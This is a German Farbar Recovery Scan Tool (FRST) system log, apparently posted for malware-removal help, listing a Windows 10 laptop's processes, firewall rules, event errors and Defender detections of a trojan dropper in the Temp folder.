Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxp://bstbk-vollmachtsdatenbank.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxps://bstbk-vollmachtsdatenbank.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxp://download.datev.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxps://download.datev.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\sharepoint.com -> hxxps://rswm-files.sharepoint.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\buskr5\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img-20170430-wa0003.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

Network Binding:
=============
Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 
WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{166A50AB-BA35-4DC0-94F9-86E3C7612B7F}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{E39623A3-4694-43EA-861D-846DE1BBE081}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{41F20948-57E6-48C0-B787-8E350E0F4AE3}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{9EC5C841-0316-4C4C-8AC6-5D47D1515E43}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2C47819B-0C76-41E7-8951-FF9884032B29}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{A528EDB2-5B14-4C19-840E-E50161882359}] => (Allow) LPort=5357
FirewallRules: [{35A9C84E-C44A-4EB6-A179-101E53499E5B}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{DF2A37A0-22B5-4F56-BEF2-D55F24A9E8A6}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{6C39964B-8607-462D-BADE-7B852BCE9A96}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{DEC7E16E-33C1-4DE9-A3C5-D9205AEE5645}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{24C9FA9C-13A2-43E7-A79D-703A70335C05}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{65C8E351-555D-4A86-9AB3-CD29636B7DA9}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{E69D8B9E-7CEB-410C-8145-C81E4CCB8E77}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{BC66B58C-B648-4497-889E-7FB43E3E140B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9CF1E217-96B2-4C50-B89D-32E490BC3A5D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C0B9ABF0-C6CA-44B7-9DF8-6AE21BACF8B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EBD4A9EA-A5CF-42F3-999B-FC71F044B516}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{6A280486-017D-4867-948B-EF1175A2B9A1}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei
FirewallRules: [UDP Query User{3098913F-3817-46A9-B646-AEE9F468614B}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei
FirewallRules: [{24B5A986-5521-4ED0-9467-91D2225031A8}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{7510E694-223F-4E51-80DD-869688F9BE1F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{5EDC0426-307F-4140-BC21-6F42F1A6D414}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{ACF9D1E2-41C9-4BCA-BFDE-C58E7AEB1799}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{9C443C88-A482-48E0-A390-269EC8292DA5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{C2472821-64AA-418D-B658-F3DC8B7D5DC9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Wiederherstellungspunkte =========================

21-12-2020 07:06:20 Geplanter Prüfpunkt
28-12-2020 10:50:36 Geplanter Prüfpunkt
06-01-2021 10:37:08 Geplanter Prüfpunkt
09-01-2021 15:44:13 Removed Eumex RNDIS64 Treiber V1.02.

==================== Fehlerhafte Geräte im Gerätemanager ============

Name: Shrew Soft Virtual Adapter
Description: Shrew Soft Virtual Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Shrew Soft
Service: vnet
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc0000005
Fehleroffset: 0x03233f2e
ID des fehlerhaften Prozesses: 0x285c
Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 4c0

Startzeit: 01d6df75472ad580

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Unknown

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 838

Startzeit: 01d6df7570957287

Beendigungszeit: 24

Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2ddc

Startzeit: 01d6d2c180af7335

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe

Relative Anwendungs-ID des fehlerhaften Pakets: App

Absturztyp: Cross-process

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 28f4

Startzeit: 01d6d2c07cb57be1

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process

Error: (12/15/2020 09:58:42 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2608

Startzeit: 01d6d2b1bd864c9b

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: b520483e-c602-45e2-8fe9-15a88b5d0f17

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Unknown

Error: (12/10/2020 08:09:56 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


Systemfehler:
=============
Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{3BC5F68A-AC3D-4857-B586-8D51861CC0B9}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 06:20:07 PM) (Source: DCOM) (EventID: 10010) (User: PC5-L)
Description: Der Server "{13F2B435-3AF4-46B7-B4A5-0C82E1EC564F}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/09/2021 03:46:20 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXjytc7c0yvwb8n3cw0r82k4364sd1s7bv.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca

Error: (01/09/2021 03:37:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:36:42 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:36:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca


Windows Defender:
===================================
Date: 2021-01-09 18:21:34.8610000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-09 15:47:12.9890000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-09 15:27:32.2830000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {CD392251-82AD-4230-8B1B-02F5DAAE2DF1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-09 15:00:56.0110000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-07 19:07:31.1610000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {F826CD36-B17A-4994-843F-547ED9BF91B1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Vollständige Überprüfung
Benutzer: PC5-L\buskr5

CodeIntegrity:
===================================

Date: 2021-01-09 18:21:31.2260000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 18:21:31.2240000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 18:21:30.9930000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 18:21:30.9910000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 18:20:56.8370000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-09 18:20:56.8330000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-09 18:15:12.0120000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 18:15:12.0100000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019
Hauptplatine: FUJITSU FJNBB5C
Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz
Prozentuale Nutzung des RAM: 39%
Installierter physikalischer RAM: 8088.56 MB
Verfügbarer physikalischer RAM: 4883.76 MB
Summe virtueller Speicher: 9368.56 MB
Verfügbarer virtueller Speicher: 6225.64 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.32 GB) (Free:164.91 GB) NTFS

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS
\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS
\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 238.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von buskr5 (Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (09-01-2021 18:21:26)
Gestartet von C:\Users\buskr5\Downloads
Geladene Profile: buskr5
Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Chrome
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe
(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe
(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe
(FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED) C:\Windows\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe
(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe
(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\jhi_service.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHDCPSvc.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHeciSvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Learnpulse -> Learnpulse) C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\iked.exe
(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [Screenpresso] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe [18398304 2021-01-09] (Learnpulse -> Learnpulse)
